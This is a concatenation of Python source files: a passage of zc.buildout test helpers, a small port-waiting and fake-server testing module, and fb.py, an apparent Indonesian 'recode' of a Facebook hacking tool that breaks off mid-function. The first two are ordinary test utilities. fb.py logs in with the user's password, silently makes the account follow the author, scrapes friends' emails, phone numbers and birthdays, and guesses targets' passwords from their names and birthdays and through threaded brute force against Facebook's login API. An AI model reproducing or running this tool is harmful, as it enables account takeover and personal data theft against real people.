rmtree(base)) old_home = os.environ.get('HOME') os.environ['HOME'] = os.path.join(base, 'bbbBadHome') def restore_home(): if old_home is None: del os.environ['HOME'] else: os.environ['HOME'] = old_home register_teardown(restore_home) base = os.path.join(base, '_TEST_') os.mkdir(base) tmp = tempfile.mkdtemp('buildouttests') register_teardown(lambda: rmtree(tmp)) zc.buildout.easy_install.default_index_url = 'file://'+tmp os.environ['buildout-testing-index-url'] = ( zc.buildout.easy_install.default_index_url) def tmpdir(name): path = os.path.join(base, name) mkdir(path) return path sample = tmpdir('sample-buildout') os.chdir(sample) # Create a basic buildout.cfg to avoid a warning from buildout: with open('buildout.cfg', 'w') as f: f.write("[buildout]\nparts =\n") # Use the buildout bootstrap command to create a buildout zc.buildout.buildout.Buildout( 'buildout.cfg', [('buildout', 'log-level', 'WARNING'), # trick bootstrap into putting the buildout develop egg # in the eggs dir. ('buildout', 'develop-eggs-directory', 'eggs'), ] ).bootstrap([]) # Create the develop-eggs dir, which didn't get created the usual # way due to the trick above: os.mkdir('develop-eggs') def start_server(path): port, thread = _start_server(path, name=path) url = 'http://localhost:%s/' % port register_teardown(lambda: stop_server(url, thread)) return url cdpaths = [] def cd(*path): path = os.path.join(*path) cdpaths.append(os.path.abspath(os.getcwd())) os.chdir(path) def uncd(): os.chdir(cdpaths.pop()) test.globs.update(dict( sample_buildout = sample, ls = ls, cat = cat, mkdir = mkdir, rmdir = rmdir, remove = remove, tmpdir = tmpdir, write = write, system = system, get = get, cd = cd, uncd = uncd, join = os.path.join, sdist = sdist, bdist_egg = bdist_egg, start_server = start_server, buildout = os.path.join(sample, 'bin', 'buildout'), wait_until = wait_until, print_ = print_, clean_up_pyc = clean_up_pyc, )) zc.buildout.easy_install.prefer_final(prefer_final) def buildoutTearDown(test): for f in test.globs['__tear_downs']: f() class Server(HTTPServer): def __init__(self, tree, *args): HTTPServer.__init__(self, *args) self.tree = os.path.abspath(tree) __run = True def serve_forever(self): while self.__run: self.handle_request() def handle_error(self, *_): self.__run = False class Handler(BaseHTTPRequestHandler): Server.__log = False def __init__(self, request, address, server): self.__server = server self.tree = server.tree BaseHTTPRequestHandler.__init__(self, request, address, server) def do_GET(self): if '__stop__' in self.path: raise SystemExit def k(): self.send_response(200) out = '<html><body>k</body></html>\n'.encode() self.send_header('Content-Length', str(len(out))) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(out) if self.path == '/enable_server_logging': self.__server.__log = True return k() if self.path == '/disable_server_logging': self.__server.__log = False return k() path = os.path.abspath(os.path.join(self.tree, *self.path.split('/'))) if not ( ((path == self.tree) or path.startswith(self.tree+os.path.sep)) and os.path.exists(path) ): self.send_response(404, 'Not Found') #self.send_response(200) out = '<html><body>Not Found</body></html>'.encode() #out = '\n'.join(self.tree, self.path, path) self.send_header('Content-Length', str(len(out))) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(out) return self.send_response(200) if os.path.isdir(path): out = ['<html><body>\n'] names = sorted(os.listdir(path)) for name in names: if os.path.isdir(os.path.join(path, name)): name += '/' out.append('<a href="%s">%s</a><br>\n' % (name, name)) out.append('</body></html>\n') out = ''.join(out).encode() self.send_header('Content-Length', str(len(out))) self.send_header('Content-Type', 'text/html') else: with open(path, 'rb') as f: out = f.read() self.send_header('Content-Length', len(out)) if path.endswith('.egg'): self.send_header('Content-Type', 'application/zip') elif path.endswith('.gz'): self.send_header('Content-Type', 'application/x-gzip') elif path.endswith('.zip'): self.send_header('Content-Type', 'application/x-gzip') else: self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(out) def log_request(self, code): if self.__server.__log: print_('%s %s %s' % (self.command, code, self.path)) def _run(tree, port): server_address = ('localhost', port) httpd = Server(tree, server_address, Handler) httpd.serve_forever() def get_port(): for i in range(10): port = random.randrange(20000, 30000) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: try: s.connect(('localhost', port)) except socket.error: return port finally: s.close() raise RuntimeError("Can't find port") def _start_server(tree, name=''): port = get_port() thread = threading.Thread(target=_run, args=(tree, port), name=name) thread.setDaemon(True) thread.start() wait(port, up=True) return port, thread def start_server(tree): return _start_server(tree)[0] def stop_server(url, thread=None): try: urlopen(url+'__stop__') except Exception: pass if thread is not None: thread.join() # wait for thread to stop def wait(port, up): addr = 'localhost', port for i in range(120): time.sleep(0.25) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(addr) s.close() if up: break except socket.error: e = sys.exc_info()[1] if e[0] not in (errno.ECONNREFUSED, errno.ECONNRESET): raise s.close() if not up: break else: if up: raise else: raise SystemError("Couldn't stop server") def install(project, destination): if not isinstance(destination, str): destination = os.path.join(destination.globs['sample_buildout'], 'eggs') dist = pkg_resources.working_set.find( pkg_resources.Requirement.parse(project)) if dist.location.endswith('.egg'): destination = os.path.join(destination, os.path.basename(dist.location), ) if os.path.isdir(dist.location): shutil.copytree(dist.location, destination) else: shutil.copyfile(dist.location, destination) else: # copy link with open(os.path.join(destination, project+'.egg-link'), 'w') as f: f.write(dist.location) def install_develop(project, destination): if not isinstance(destination, str): destination = os.path.join(destination.globs['sample_buildout'], 'develop-eggs') dist = pkg_resources.working_set.find( pkg_resources.Requirement.parse(project)) with open(os.path.join(destination, project+'.egg-link'), 'w') as f: f.write(dist.location) def _normalize_path(match): path = match.group(1) if os.path.sep == '\\': path = path.replace('\\\\', '/') if path.startswith('\\'): path = path[1:] return '/' + path.replace(os.path.sep, '/') normalize_path = ( re.compile( r'''[^'" \t\n\r]+\%(sep)s_[Tt][Ee][Ss][Tt]_\%(sep)s([^"' \t\n\r]+)''' % dict(sep=os.path.sep)), _normalize_path, ) normalize_endings = re.compile('\r\n'), '\n' normalize_script = ( re.compile('(\n?)- ([a-zA-Z_.-]+)-script.py\n- \\2.exe\n'), '\\1- \\2\n') if sys.version_info > (2, ): normalize___pycache__ = ( re.compile('(\n?)d __pycache__\n'), '\\1') else: normalize___pycache__ = ( re.compile('(\n?)- \S+\.pyc\n'), '\\1') normalize_egg_py = ( re.compile('-py\d[.]\d(-\S+)?.egg'), '-pyN.N.egg', ) normalize_exception_type_for_python_2_and_3 = ( re.compile(r'^(\w+\.)*([A-Z][A-Za-z0-9]+Error: )'), '\2') not_found = (re.compile(r'Not found: [^\n]+/(\w|\.)+/\r?\n'), '') # Setuptools now pulls in dependencies when installed. adding_find_link = (re.compile(r"Adding find link '[^']+'" r" from setuptools .*\r?\n"), '') ignore_not_upgrading = ( re.compile( 'Not upgrading because not running a local buildout command.\n' ), '')
testing.py
from __future__ import unicode_literals from builtins import bytes, dict, list, int, float, str import errno import os import os.path import sys import signal import socket import threading import time if sys.version_info.major == 2: class ConnectionRefusedError(Exception): pass class PortFreeTimeout(Exception): def __init__(self, port): self.port = port def __str__(self): return "PortFreeTimeout: Port %d is not free" % (self.port) class PortReadyTimeout(Exception): def __init__(self, port): self.port = port def __str__(self): return "PortReadyTimeout: Port %d is not ready for TCP connections" % (self.port) def wait_for_unix_socket_gone(socket_path, timeout): start_time = time.time() sock = None while (time.time() - start_time < timeout): if not os.path.exists(socket_path): return time.sleep(0.5) raise PortFreeTimeout(socket_path) def wait_for_unix_socket_in_use(socket_path, timeout): start_time = time.time() sock = None while (time.time() - start_time < timeout): if os.path.exists(socket_path): return time.sleep(0.5) raise PortReadyTimeout(socket_path) def wait_for_free_port(host, port, timeout): """ Waits for a TCP port to become free Args: host (str): TCP host to wait for port (int): TCP port to wait for timeout (int): Timeout in seconds until we give up waiting Raises: PortFreeTimeout: If port doesn't become free after timeout seconds """ start_time = time.time() sock = None while (time.time() - start_time < timeout): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) sock.close() except (ConnectionRefusedError, socket.error) as e: if type(e) == socket.error and e.errno != errno.ECONNREFUSED: raise e # success sock.close() return time.sleep(0.5) raise PortFreeTimeout(port) def wait_for_tcp_port_in_use(host, port, timeout): """ Waits for a TCP port to become ready to accept connections Args: host (str): TCP host to wait for port (int): TCP port to wait for timeout (int): Timeout in seconds until we give up waiting Raises: PortReadyTimeout: If the port is not ready after timeout seconds """ start_time = time.time() sock = None while (time.time() - start_time < timeout): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) sock.close() return except (ConnectionRefusedError, socket.error) as e: if type(e) == socket.error and e.errno != errno.ECONNREFUSED: raise e # still waiting sock.close() raise PortReadyTimeout(port) class FakeServer(object): """ Runs a TCP server in a thread and replies from a list of pre-defined replies """ def __init__(self, host, port): self.host = host self.port = port self.replies = [] self.requests = [] def add_reply(self, reply): self.replies.append(reply) def run(self): self.thread = threading.Thread(target = self._run, args = ()) self.thread.start() wait_for_tcp_port_in_use(self.host, self.port, 5) def _run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((self.host, self.port)) sock.listen(10) while self.replies: try: conn, addr = sock.accept() request = conn.recv(4096) if not len(request): conn.close() continue self.requests.append(request.decode('utf-8')) reply = self.replies.pop(0) conn.sendall(reply.encode('utf-8')) conn.sendall(b'\r\n') conn.close() except ConnectionResetError: pass sock.close() def stop(self): self.thread.join() if self.thread.is_alive(): raise RuntimeError("Failed to join on FakeServer thread") wait_for_free_port(self.host, self.port, 5) class ServerRunner(object): """ Runs a server program in a subprocess and allows to stop it again """ def __init__(self, path, port): self.directory = os.path.dirname(path) self.server_program = os.path.basename(path) self.host = 'localhost' self.port = port self.pid = None self.timeout = 5 def run(self): # we don't fork before we know that the TCP port/UNIX socket is free if isinstance(self.port, int): wait_for_free_port(self.host, self.port, self.timeout) else: wait_for_unix_socket_gone(self.port, self.timeout) pid = os.fork() if not pid: # child os.chdir(self.directory) if self.server_program.endswith('.py'): python = sys.executable os.execl(python, python, self.server_program) else: os.execl(self.server_program, self.server_program) else: # parent self.pid = pid if isinstance(self.port, int): wait_for_tcp_port_in_use(self.host, self.port, self.timeout) else: wait_for_unix_socket_in_use(self.port, self.timeout) def stop(self): os.kill(self.pid, signal.SIGINT) os.waitpid(self.pid, 0) if isinstance(self.port, int): wait_for_free_port(self.host, self.port, self.timeout) else: wait_for_unix_socket_gone(self.port, self.timeout)
fb.py
# -*- coding: utf-8 -*- # katanya programmer kok recode? # saya selaku manusia biasa mengucapkan, "BODO AMAT". # yang penting ngepush github ;-; import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize from multiprocessing.pool import ThreadPool from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')] def keluar(): print '\x1b[1;91m[!] Closed' os.sys.exit() def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.01) logo = " \x1b[1;97m█████████\n \x1b[1;97m█▄█████▄█ \x1b[1;96m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;97m█ \x1b[1;91m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;97m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;97m█ \x1b[1;91m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPRO v1.7\n \x1b[1;97m█████████ \x1b[1;96m«==========✧==========»\n \x1b[1;97m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m xjusthaxor \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m:\x1b[1;92m\x1b[92mhttps://github.com/xjusthaxor\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mYouTube \x1b[1;91m:\x1b[1;92\x1b[92mhttps://www.youtube.com/c/aadityaa\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n[*] Silahkan Login Operamini Agar Tidak Checkpoint\n' def tik(): titik = [ '. ', '.. ', '... '] for o in titik: print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) back = 0 threads = [] berhasil = [] cekpoint = [] gagal = [] idfriends = [] idfromfriends = [] idmem = [] id = [] em = [] emfromfriends = [] hp = [] hpfromfriends = [] reaksi = [] reaksigrup = [] komen = [] komengrup = [] listgrup = [] vulnot = '\x1b[31mNot Vuln' vuln = '\x1b[32mVuln' def login(): os.system('clear') try: toket = open('login.txt', 'r') menu() except (KeyError, IOError): os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]' id = raw_input('\x1b[1;91m[+] \x1b[1;36mEmail \x1b[1;91m:\x1b[1;92m ') pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mSandi \x1b[1;91m:\x1b[1;92m ') tik() try: br.open('https://m.facebook.com') except mechanize.URLError: print '\n\x1b[1;91m[!] Tidak Ada Koneksi' keluar() br._factory.is_html = True br.select_form(nr=0) br.form['email'] = id br.form['pass'] = pwd br.submit() url = br.geturl() if 'save-device' in url: try: sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'} x = hashlib.new('md5') x.update(sig) a = x.hexdigest() data.update({'sig': a}) url = 'https://api.facebook.com/restserver.php' r = requests.get(url, params=data) z = json.loads(r.text) zedd = open('login.txt', 'w') zedd.write(z['access_token']) zedd.close() print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success' requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token']) time.sleep(1) menu() except requests.exceptions.ConnectionError: print '\n\x1b[1;91m[!] Tidak Ada Koneksi' keluar() if 'checkpoint' in url: print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint' os.system('rm -rf login.txt') time.sleep(1) keluar() else: print '\n\x1b[1;91m[!] Gagal Masuk' os.system('rm -rf login.txt') time.sleep(1) login() def menu(): try: toket = open('login.txt', 'r').read() except IOError: os.system('clear') print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: otw = requests.get('https://graph.facebook.com/me?access_token=' + toket) a = json.loads(otw.text) nama = a['name'] id = a['id'] ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket) b = json.loads(ots.text) sub = str(b['summary']['total_count']) except KeyError: os.system('clear') print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint' os.system('rm -rf login.txt') time.sleep(1) login() except requests.exceptions.ConnectionError: print logo print '\x1b[1;91m[!] Tidak Ada Koneksi' keluar() os.system('clear') print logo print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║' print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝' print '║-> \x1b[1;37;40m1. User Information' print '║-> \x1b[1;37;40m2. Hack Facebook Account' print '║-> \x1b[1;37;40m3. Bot' print '║-> \x1b[1;37;40m4. Others' print '║-> \x1b[1;37;40m5. Update' print '║-> \x1b[1;37;40m6. Logout' print '║-> \x1b[1;31;40m0. Exit' print '\x1b[1;37;40m║' pilih() def pilih(): zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if zedd == '': print '\x1b[1;91m[!] Can\'t empty' pilih() else: if zedd == '1': informasi() else: if zedd == '2': menu_hack() else: if zedd == '3': menu_bot() else: if zedd == '4': lain() else: if zedd == '5': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' os.system('git pull origin master') raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() else: if zedd == '6': os.system('rm -rf login.txt') os.system('xdg-open https://www.youtube.com/c/aadityaa') keluar() else: if zedd == '0': keluar() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel' pilih() def informasi(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(r.text) for p in cok['data']: if id in p['name'] or id in p['id']: r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket) z = json.loads(r.text) print 52 * '\x1b[1;97m\xe2\x95\x90' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + z['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot found' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot found' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot found' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPhone Number\x1b[1;97m : ' + z['mobile_phone'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mPhone Number\x1b[1;97m : \x1b[1;91mNot found' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : ' + z['location']['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot found' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mBirthday\x1b[1;97m : ' + z['birthday'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mBirthday\x1b[1;97m : \x1b[1;91mNot found' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : ' for q in z['education']: try: print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name'] except KeyError: print '\x1b[1;91m ~ \x1b[1;91mNot found' except KeyError: pass raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() else: print '\x1b[1;91m[\xe2\x9c\x96] User not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() def menu_hack(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)' print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook' print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook' print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)' print '║-> \x1b[1;37;40m5. Yahoo Checker' print '║-> \x1b[1;37;40m6. Get ID/Email/HP' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' hack_pilih() def hack_pilih(): hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if hack == '': print '\x1b[1;91m[!] Can\'t empty' hack_pilih() else: if hack == '1': mini() else: if hack == '2': crack() hasil() else: if hack == '3': super() else: if hack == '4': brute() else: if hack == '5': menu_yahoo() else: if hack == '6': grab() else: if hack == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found' hack_pilih() def mini(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[ INFO ] Target must be your friend !' try: id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) a = json.loads(r.text) print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name'] jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...') time.sleep(2) jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...') time.sleep(2) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' pz1 = a['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: pz2 = a['first_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: pz3 = a['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: lahir = a['birthday'] pz4 = lahir.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: print '\x1b[1;91m[!] Sorry, opening password target failed :(' print '\x1b[1;91m[!] Try other method.' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() except KeyError: print '\x1b[1;91m[!] Terget not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() def crack(): global file global idlist global passw os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m') try: file = open(idlist, 'r') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') for x in range(40): zedd = threading.Thread(target=scrak, args=()) zedd.start() threads.append(zedd) for zedd in threads: zedd.join() except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() def scrak(): global back global berhasil global cekpoint global gagal global up try: buka = open(idlist, 'r') up = 